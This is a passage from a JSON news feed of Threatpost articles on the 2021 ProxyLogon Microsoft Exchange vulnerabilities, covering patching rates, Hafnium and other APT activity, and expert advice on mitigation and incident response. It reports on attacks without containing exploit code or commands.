event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-15T12:19:13", "type": "threatpost", "title": "Attackers Target ProxyLogon Exploit to Install Cryptojacker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-04-15T12:19:13", "id": "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "href": "https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-26T19:00:10", "description": "The patching level for Microsoft Exchange Servers that are vulnerable to the [ProxyLogon group of security bugs](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) has reached 92 percent, according to Microsoft.\n\nThe computing giant [tweeted out the stat](<https://twitter.com/msftsecresponse/status/1374075310195412992>) earlier this week \u2013 though of course patching won\u2019t fix already-compromised machines. Still, that\u2019s an improvement of 43 percent just since last week, Microsoft pointed out (using telemetry from RiskIQ).\n\n> Our work continues, but we are seeing strong momentum for on-premises Exchange Server updates: \n\u2022 92% of worldwide Exchange IPs are now patched or mitigated. \n\u2022 43% improvement worldwide in the last week. [pic.twitter.com/YhgpnMdlOX](<https://t.co/YhgpnMdlOX>)\n> \n> \u2014 Security Response (@msftsecresponse) [March 22, 2021](<https://twitter.com/msftsecresponse/status/1374075310195412992?ref_src=twsrc%5Etfw>)\n\nProxyLogon consists of four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065) that can be chained together to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials. This gives them access to email communications and the opportunity to install a web shell for further exploitation within the environment.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe good news on patching comes as a whirlwind of ProxyLogon cyberattacks has hit companies across the globe, with multiple advanced persistent threats (APT) and possibly other adversaries moving quickly to exploit the bug. A spate of public proof-of-concept exploits has added fuel to the fire \u2013 which is blazing so bright that F-Secure said on Sunday that hacks are occurring \u201cfaster than we can count,\u201d with tens of thousands of machines compromised.\n\n\u201cTo make matters worse, proof-of-concept automated attack scripts are being made publicly available, making it possible for even unskilled attackers to quickly gain remote control of a vulnerable Microsoft Exchange Server,\u201d according to [F-Secure\u2019s writeup](<https://blog.f-secure.com/microsoft-exchange-proxylogon/>). \u201cThere is even a fully functioning package for exploiting the vulnerability chain published to the Metasploit application, which is commonly used for both hacking- and security testing. This free-for-all attack opportunity is now being exploited by vast numbers of criminal gangs, state-backed threat actors and opportunistic script kiddies.\u201d\n\nThe attackers are using ProxyLogon to carry out a range of attacks, including data theft and the installation of malware, such as the recently discovered \u201cBlackKingdom\u201d strain. According to Sophos, the ransomware operators are asking for $10,000 in Bitcoin in exchange for an encryption key.\n\n## **Patching Remains Tough for Many**\n\nThe CyberNews investigation team [found](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>) 62,174 potentially vulnerable unpatched Microsoft Exchange Servers around the world, as of Wednesday.\n\n\n\nClick to enlarge. Source: CyberNews.\n\nVictor Wieczorek, practice director for Threat & Attack Simulation at GuidePoint Security, noted that some organizations are not structured or resourced to patch effectively against ProxyLogon.\n\n\u201cThis is because, 1) a lack of accurate asset inventory and ownership information; and 2) lag time to vet patching for negative impacts on the business and gain approval from asset/business owners to patch,\u201d he told Threatpost. \u201cIf you don\u2019t have an accurate inventory with a high level of confidence, it takes a long time to hunt down affected systems. You have to determine who owns them and if applying the patch would negatively impact the system\u2019s function. Responsible and timely patching takes lots of proactive planning and tracking.\u201d\n\nHe added that by regularly testing existing controls (red-teaming), searching for indicators of existing weakness and active threats (threat hunting), and investing/correcting confirmed vulnerabilities (vulnerability management), organizations are going to be in a much better spot to adjust to emerging vulnerabilities and invoke their incident-response capabilities when needed.\n\n## **APT Activity Continues**\n\nMicrosoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange servers.\n\nAnd indeed, Microsoft noted that adversaries from a Chinese APT called Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access. It\u2019s also apparent that Hafnium isn\u2019t the only party of interest, according to multiple researchers; [ESET said earlier in March](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that at least 10 different APTs are using the exploit.\n\nThe sheer volume of APTs mounting attacks, most of them starting in the days before ProxyLogon became publicly known, has prompted questions as to the exploit\u2019s provenance \u2013 and ESET researchers mused whether it was shared around the Dark Web on a wide scale.\n\nThe APTs seem mainly bent on cyberespionage and data theft, researchers said.\n\n\u201cThese breaches could be occurring in the background, completely unnoticed. Only after months or years will it become clear what was stolen,\u201d according to F-Secure. \u201cIf an attacker knows what they are doing, the data has most likely already been stolen or is being stolen right now.\u201d\n\nSeveral versions of the on-premise flavor of Exchange are vulnerable to the four bugs, including Exchange 2013, 2016 and 2019. Cloud-based and hosted versions are not vulnerable to ProxyLogon.\n\n## **Patching is Not Enough; Assume Compromise**\n\nUnfortunately, installing the ProxyLogon security patches alone does not guarantee that a server is secure \u2013 an attacker may have breached it before the update was installed.\n\n\u201cPatching is like closing a door. Therefore, 92 percent of the doors have been closed. But the doors were open for a relatively long time and known to all the bad actors,\u201d Oliver Tavakoli, CTO at Vectra, told Threatpost. \u201cIdentifying and remediating already compromised systems will be a lot harder.\u201d\n\nBrandon Wales, the acting director for the Cybersecurity and Infrastructure Security Agency (CISA), said during a webinar this week that \u201cpatching is not sufficient.\u201d\n\n\u201cWe know that multiple adversaries have compromised networks prior to patches being applied Wales said during a [Cipher Brief webinar](<https://cybernews.com/news/patched-microsoft-exchange-servers-give-a-false-sense-of-security-says-cisas-brandon-wales/>). He added, \u201cYou should not have a false sense of security. You should fully understand the risk. In this case, how to identify whether your system is already compromised, how to remediate it, and whether you should bring in a third party if you are not capable of doing that.\u201d\n\n## **How Businesses Can Protect Against ProxyLogon**\n\nYonatan Amitay, Security Researcher at Vulcan Cyber, told Threatpost that a successful response to mitigate Microsoft Exchange vulnerabilities should consist of the following steps:\n\n * Deploy updates to affected Exchange Servers.\n * Investigate for exploitation or indicators of persistence.\n * Remediate any identified exploitation or persistence and investigate your environment for indicators of lateral movement or further compromise.\n\n\u201cIf for some reason you cannot update your Exchange servers immediately, Microsoft has released instructions for how to mitigate these vulnerabilities through reconfiguration \u2014 here, as they recognize that applying the latest patches to Exchange servers may take time and planning, especially if organizations are not on recent versions and/or associated cumulative and security patches,\u201d he said. \u201cNote that the mitigations suggested are not substitutes for installing the updates.\u201d\n\nMicrosoft also has issued a one-click mitigation and remediation tool for small- and medium-sized businesses in light of the ongoing swells of attacks.\n\nVectra\u2019s Tavakoli noted that the mitigation guides and tools Microsoft has supplied don\u2019t necessarily help post-compromise \u2013 they are intended to provide mitigation in advance of fully patching the Exchange server.\n\n\u201cThe end result of a compromise is reflective of the M.O. of each attack group, and that will be far more variable and less amenable to automated cleanup,\u201d he said.\n\nMilan Patel, global head of MSS for BlueVoyant, said that identifying follow-on malicious activity after the bad guys have gotten access to a network requires a good inventory of where data is housed.\n\n\u201cIncident response is a critical reactive tool that will help address what data could have been touched or stolen by the bad guys after they gained access to the critical systems,\u201d he told Threatpost. \u201cThis is critical, this could mean the difference between a small cleanup effort vs. potential litigation because sensitive data was stolen from the network.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-24T18:39:26", "type": "threatpost", "title": "Microsoft Exchange Servers See ProxyLogon Patching Frenzy", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-24T18:39:26", "id": "THREATPOST:BADA213290027D414693E838771F8645", "href": "https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) r